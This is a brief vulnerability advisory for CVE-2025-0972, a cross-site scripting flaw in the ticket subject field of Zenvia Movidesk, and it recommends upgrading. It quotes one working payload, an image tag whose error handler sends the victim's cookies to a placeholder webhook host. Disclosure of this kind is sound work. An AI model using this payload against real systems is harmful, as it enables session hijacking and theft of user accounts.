CVE-2025-0972 | Zenvia Movidesk up to 25.01.22 New Ticket subject cross site scripting
A vulnerability described as problematic has been identified in Zenvia Movidesk up to 25.01.22. This affects an unknown part of the component New Ticket Handler. Such manipulation of the argument subject with the input <img src="x" onerror="this.src='https://YOUR-WEBHOOK-URL?c=' + document.cookie;"> leads to cross site scripting.
This vulnerability is uniquely identified as CVE-2025-0972. The attack can be launched remotely. Moreover, an exploit is present.
Upgrading the affected component is recommended.